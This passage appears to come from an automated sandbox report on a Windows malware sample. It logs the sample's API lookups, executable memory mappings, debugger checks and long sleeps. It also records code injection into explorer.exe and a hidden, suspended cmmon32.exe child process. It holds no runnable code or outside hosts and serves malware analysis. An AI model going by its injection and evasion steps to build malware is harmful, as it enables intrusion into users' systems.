Get Address	c:\windows\system32\user32.dll	function = MonitorFromPoint, address_out = 0x766294c9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x766334a3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x7662c34e	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x76f96678	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = Sleep, address_out = 0x76c5ba46	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetDesktopWindow, address_out = 0x766301a9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76fa2dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x76c5bb08	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetErrorMode, address_out = 0x76c64a51	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = NtYieldExecution, address_out = 0x76f96aa8	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x76f95f18	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x754e4907	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegQueryValueExA, address_out = 0x754e48ef	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegCloseKey, address_out = 0x754e469d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x76c5cee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WriteFile, address_out = 0x76c61400	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x76c5ca7c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReadFile, address_out = 0x76c596fb	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetFileSize, address_out = 0x76c50273	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = UnmapViewOfFile, address_out = 0x76c5db13	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualProtectEx, address_out = 0x76c9f5d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLongPathNameA, address_out = 0x76c9f47f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TerminateProcess, address_out = 0x76c52331	1	Fn
Get Address	c:\windows\system32\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x733c9263	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAllocEx, address_out = 0x76c4c1b6	1	Fn
Get Address	c:\windows\system32\shell32.dll	function = ShellExecuteA, address_out = 0x75a57078	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumWindows, address_out = 0x7663375b	1	Fn
Get Address	c:\windows\system32\user32.dll	function = DestroyWindow, address_out = 0x7662b2f4	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumThreadWindows, address_out = 0x7662b712	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 1239756	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 1237988	1	Fn
Map	-	process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3b0000	1	Fn
Map	-	process_name = c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xa200000	1	Fn
Map	-	process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x6240000	1	Fn

Window (6)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Create	-	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Create	Delstaterne	wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = VBMsoStdCompMgr, index = 0, new_long = 28713116	1	Fn
Set Attribute	Delstaterne	index = 18446744073709551600, new_long = 33554432	1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721		1	Fn

System (42)

Operation	Additional Information	Count	Logfile
Sleep	duration = 15 milliseconds (0.015 seconds)	32	Fn
Sleep	duration = 8000 milliseconds (8.000 seconds)	1	Fn
Sleep	duration = 1237300 milliseconds (1237.300 seconds)	1	Fn
Get Info	type = Operating System	3	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Hardware Information	1	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	2	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	-		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data
Set Environment String	name = 664908S9, value = C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe, environment = 0		1	Fn

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	-		1	Fn

Process #7: explorer.exe

(Host: 11, Network: 0)

Information	Value
ID	#7
File Name	c:\windows\explorer.exe
Command Line	C:\Windows\Explorer.EXE
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:06, Reason: Injection
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:13

OS Process Information

Information	Value
PID	0x610
Parent PID	0xffffffffffffffff (Unknown)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AA4 0x 9D8 0x 9C8 0x 64 0x 548 0x 66C 0x 5C8 0x 664 0x 778 0x 674 0x 18C 0x 120 0x 7E8 0x 418 0x 160 0x 144 0x 76C 0x 760 0x 730 0x 72C 0x 728 0x 724 0x 720 0x 714 0x 70C 0x 704 0x 6F8 0x 644 0x 640 0x 638 0x 634 0x 630 0x 61C 0x 614 0x CC0

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00021fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x0011ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003c0000	0x003c0000	0x003e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x0040ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000410000	0x00410000	0x00410fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x00421fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000430000	0x00430000	0x00431fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000440000	0x00440000	0x00440fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000450000	0x00450000	0x00450fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000460000	0x00460000	0x0046ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000680000	0x00680000	0x0075efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000760000	0x00760000	0x0079ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000007a0000	0x007a0000	0x007a1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007b0000	0x007b0000	0x007b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000007c0000	0x007c0000	0x007c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000007d0000	0x007d0000	0x0080ffff	Private Memory	Readable, Writable	Region Actions
comctl32.dll.mui	0x00810000	0x00812fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000820000	0x00820000	0x00820fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000830000	0x00830000	0x00859fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000860000	0x00860000	0x00868fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000870000	0x00870000	0x00877fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000880000	0x00880000	0x00880fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x00890000	0x00893fff	Memory Mapped File	Readable	Region Actions
private_0x00000000008a0000	0x008a0000	0x00923fff	Private Memory	Readable, Writable	Region Actions
explorer.exe	0x00930000	0x00bb0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000bc0000	0x00bc0000	0x017bffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000017c0000	0x017c0000	0x01bb2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01bc0000	0x01e8efff	Memory Mapped File	Readable	Region Actions
private_0x0000000001e90000	0x01e90000	0x01efbfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f00000	0x01f00000	0x01ffffff	Private Memory	Readable, Writable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x02000000	0x02024fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x02030000	0x02033fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002040000	0x02040000	0x02041fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002050000	0x02050000	0x0205ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002060000	0x02060000	0x020dffff	Private Memory	Readable, Writable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db	0x020e0000	0x0210ffff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002110000	0x02110000	0x02111fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002120000	0x02120000	0x0215ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002160000	0x02160000	0x02160fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002170000	0x02170000	0x02173fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002180000	0x02180000	0x02183fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002190000	0x02190000	0x02191fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000021a0000	0x021a0000	0x021a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021b0000	0x021b0000	0x021b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021c0000	0x021c0000	0x021c3fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021d0000	0x021d0000	0x021d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021e0000	0x021e0000	0x021e0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000021f0000	0x021f0000	0x021f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002200000	0x02200000	0x02200fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002210000	0x02210000	0x02210fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002220000	0x02220000	0x0222ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002240000	0x02240000	0x02241fff	Pagefile Backed Memory	Readable	Region Actions
wininet.dll.mui	0x02250000	0x0225cfff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x02260000	0x02267fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x02270000	0x02273fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x02280000	0x0228ffff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x02290000	0x0229ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x00000000022a0000	0x022a0000	0x022a0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
thumbcache_32.db	0x02330000	0x0242ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000002430000	0x02430000	0x02430fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002440000	0x02440000	0x02441fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x02450000	0x02453fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002460000	0x02460000	0x02461fff	Pagefile Backed Memory	Readable	Region Actions
{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db	0x02470000	0x02470fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x02480000	0x02483fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002490000	0x02490000	0x02490fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024a0000	0x024a0000	0x024a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024b0000	0x024b0000	0x024b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024c0000	0x024c0000	0x024c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024d0000	0x024d0000	0x0250ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002510000	0x02510000	0x02510fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002520000	0x02520000	0x02520fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002530000	0x02530000	0x02530fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002540000	0x02540000	0x0257ffff	Private Memory	Readable, Writable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x02580000	0x025e5fff	Memory Mapped File	Readable	Region Actions
private_0x00000000025f0000	0x025f0000	0x0262ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002630000	0x02630000	0x0272ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002730000	0x02730000	0x02730fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002740000	0x02740000	0x0277ffff	Private Memory	Readable, Writable	Region Actions
staticcache.dat	0x02780000	0x030affff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000030b0000	0x030b0000	0x030b1fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x030c0000	0x030c3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000030d0000	0x030d0000	0x030d0fff	Private Memory	Readable, Writable, Executable	Region Actions
thumbcache_1024.db	0x030e0000	0x030e0fff	Memory Mapped File	Readable, Writable	Region Actions
thumbcache_sr.db	0x030f0000	0x030f0fff	Memory Mapped File	Readable, Writable	Region Actions
{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db	0x03100000	0x03100fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x03110000	0x03113fff	Memory Mapped File	Readable	Region Actions
{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db	0x03120000	0x03120fff	Memory Mapped File	Readable	Region Actions
thumbcache_idx.db	0x03130000	0x03130fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000003140000	0x03140000	0x0317ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003180000	0x03180000	0x031bffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000031c0000	0x031c0000	0x031c0fff	Pagefile Backed Memory	Readable	Region Actions
wdmaud.drv.mui	0x031d0000	0x031d0fff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x00000000031e0000	0x031e0000	0x031e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000031f0000	0x031f0000	0x0322ffff	Private Memory	Readable, Writable	Region Actions
mmdevapi.dll.mui	0x03230000	0x03230fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000003240000	0x03240000	0x03241fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003250000	0x03250000	0x03251fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000003260000	0x03260000	0x03261fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000003270000	0x03270000	0x032affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000032b0000	0x032b0000	0x032e2fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000032f0000	0x032f0000	0x0332ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003330000	0x03330000	0x03331fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000003340000	0x03340000	0x03340fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003350000	0x03350000	0x03350fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000003360000	0x03360000	0x03360fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000003370000	0x03370000	0x033affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000033b0000	0x033b0000	0x033fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003400000	0x03400000	0x03447fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003450000	0x03450000	0x03452fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000003460000	0x03460000	0x0349ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000034a0000	0x034a0000	0x034dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000034e0000	0x034e0000	0x034e0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000034f0000	0x034f0000	0x0352ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003530000	0x03530000	0x03531fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000003540000	0x03540000	0x0357ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003580000	0x03580000	0x03581fff	Pagefile Backed Memory	Readable	Region Actions
oleaccrc.dll	0x03590000	0x03590fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000035a0000	0x035a0000	0x035a1fff	Pagefile Backed Memory	Readable	Region Actions
bthprops.cpl.mui	0x035b0000	0x035b6fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000035c0000	0x035c0000	0x035fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003600000	0x03600000	0x03601fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000003610000	0x03610000	0x03611fff	Pagefile Backed Memory	Readable	Region Actions
prnfldr.dll.mui	0x03620000	0x03623fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000003630000	0x03630000	0x0366ffff	Private Memory	Readable, Writable	Region Actions Download Dump
netshell.dll.mui	0x03670000	0x03680fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000003690000	0x03690000	0x036cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000036d0000	0x036d0000	0x0370ffff	Private Memory	Readable, Writable	Region Actions Download Dump
thumbcache_32.db	0x03710000	0x0380ffff	Memory Mapped File	Readable, Writable	Region Actions
thumbcache_96.db	0x03810000	0x0390ffff	Memory Mapped File	Readable, Writable	Region Actions
thumbcache_256.db	0x03910000	0x03a0ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000005a00000	0x05a00000	0x05a3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005b40000	0x05b40000	0x05b7ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffa1000	0x7ffa1000	0x7ffa1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffa6000	0x7ffa6000	0x7ffa6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffa7000	0x7ffa7000	0x7ffa7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffd3000	0x7ffd3000	0x7ffd3fff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 242 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	0xb88	address = 0x6240000, size = 1441792	1	Fn
Modify Control Flow	#6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	0xb88	os_tid = 0x614, address = 0x630dba7	1	Fn
Modify Control Flow	#6: c:\users\bgc6u8~1\appdata\local\temp\lambdoidtegument.exe	0xb88	os_tid = 0x614, address = 0x630dbac	1	Fn

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Windows\SYSTEM32\ntdll.dll	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Windows\System32\cmmon32.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Windows\SYSTEM32\ntdll.dll	desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Get Info	\??\C:\Windows\SYSTEM32\ntdll.dll	type = extended	1	Fn
Get Info	\??\C:\Windows\System32\cmmon32.exe	type = extended	1	Fn
Read	\??\C:\Windows\System32\cmmon32.exe	offset = 0, size = 43008	1	Fn Data

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\System32\cmmon32.exe	os_pid = 0xbd4, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, CREATE_NO_WINDOW, show_window = SW_HIDE		1	Fn
Get Info	C:\Windows\System32\cmmon32.exe	type = PROCESS_BASIC_INFORMATION		1	Fn

Memory (1)

Operation	Process	Additional Information	Success	Count	Logfile
Read	C:\Windows\System32\cmmon32.exe	address = 0x7ffda008, size = 4		1	Fn Data

Module (2)

Operation	Module	Additional Information	Success	Count	Logfile
Create Mapping	-	protection = PAGE_EXECUTE, maximum_size = 0		1	Fn
Map	-	process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x3710000		1	Fn

Process #8: cmmon32.exe

(Host: 333, Network: 0)

Information	Value
ID	#8
File Name	c:\windows\system32\cmmon32.exe
Command Line	"C:\Windows\System32\cmmon32.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:07, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:12

OS Process Information

Information	Value
PID	0xbd4
Parent PID	0x610 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BD8 0x C7C 0x CCC 0x CD0 0x CE0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00079fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000080000	0x00080000	0x00081fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cmmon32.exe.mui	0x00090000	0x00091fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001e9fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000200000	0x00200000	0x00200fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00250000	0x002b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000002c0000	0x002c0000	0x00387fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000390000	0x00390000	0x00490fff	Pagefile Backed Memory	Readable	Region Actions
oleaccrc.dll	0x004a0000	0x004a0fff	Memory Mapped File	Readable	Region Actions
private_0x00000000004a0000	0x004a0000	0x004a0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004b0000	0x004b0000	0x004b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000004c0000	0x004c0000	0x004cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004d0000	0x004d0000	0x0060afff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000004d0000	0x004d0000	0x004f9fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000500000	0x00500000	0x0053ffff	Private Memory	Readable, Writable	Region Actions
windowsshell.manifest	0x00540000	0x00540fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000540000	0x00540000	0x00540fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000550000	0x00550000	0x00551fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000560000	0x00560000	0x0059ffff	Private Memory	Readable, Writable	Region Actions
rpcss.dll	0x005a0000	0x005fbfff	Memory Mapped File	Readable	Region Actions
index.dat	0x005a0000	0x005affff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x005b0000	0x005b7fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x005c0000	0x005cbfff	Memory Mapped File	Readable, Writable	Region Actions
urlmon.dll.mui	0x005d0000	0x005d7fff	Memory Mapped File	Readable, Writable	Region Actions
